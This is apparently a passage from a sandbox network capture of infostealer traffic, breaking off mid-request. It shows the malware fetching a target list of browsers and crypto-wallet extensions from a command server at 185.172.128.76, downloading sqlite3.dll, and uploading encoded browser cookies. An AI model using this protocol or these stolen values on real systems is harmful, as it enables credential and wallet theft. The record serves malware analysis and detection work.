GF8Y2hyb
Apr 23, 2024 09:43:14.069308996 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 23, 2024 09:43:14.083688021 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJ Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="message"plugins------GIJDGCAEBFIIECAKFHIJ--
Apr 23, 2024 09:43:14.396563053 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhb
Apr 23, 2024 09:43:14.396579027 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
Apr 23, 2024 09:43:14.396599054 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 23, 2024 09:43:14.396610975 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 23, 2024 09:43:14.396627903 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 23, 2024 09:43:14.418423891 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFID Host: 185.172.128.76 Content-Length: 6911 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:14.418423891 CEST	6911	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 Data Ascii: ------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 23, 2024 09:43:14.746701956 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:15.070194960 CEST	93	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 23, 2024 09:43:15.380364895 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:15 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Apr 23, 2024 09:43:15.380383015 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 23, 2024 09:43:15.380397081 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 23, 2024 09:43:15.380410910 CEST	1289	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
Apr 23, 2024 09:43:15.380422115 CEST	1289	IN	Data Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75 Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
Apr 23, 2024 09:43:17.443062067 CEST	952	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJE Host: 185.172.128.76 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 2d 2d 0d 0a Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6YVlMc2RwVzRVRVlOM3ZZcV9yYlJyTkZ4TTFqb3pQR3Voak9SQlpLS016MnRkRHBWZTdkTnVUV3A0Q3lLLXp0NUlzNndWRWx2ZVdBZktRZ3dOSmlLS3RYSENDQ21ybGd6WlRsNUNpS2pUZUEyaVFxZjZ6bFJLMmg4d2cxaFZwSXNXc2FLcWFXSnlITVBGM0pBCg==------AKFHCAKJDBKKEBFIIJJE--
Apr 23, 2024 09:43:17.771689892 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:17.834619999 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 2d 2d 0d 0a Data Ascii: ------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; 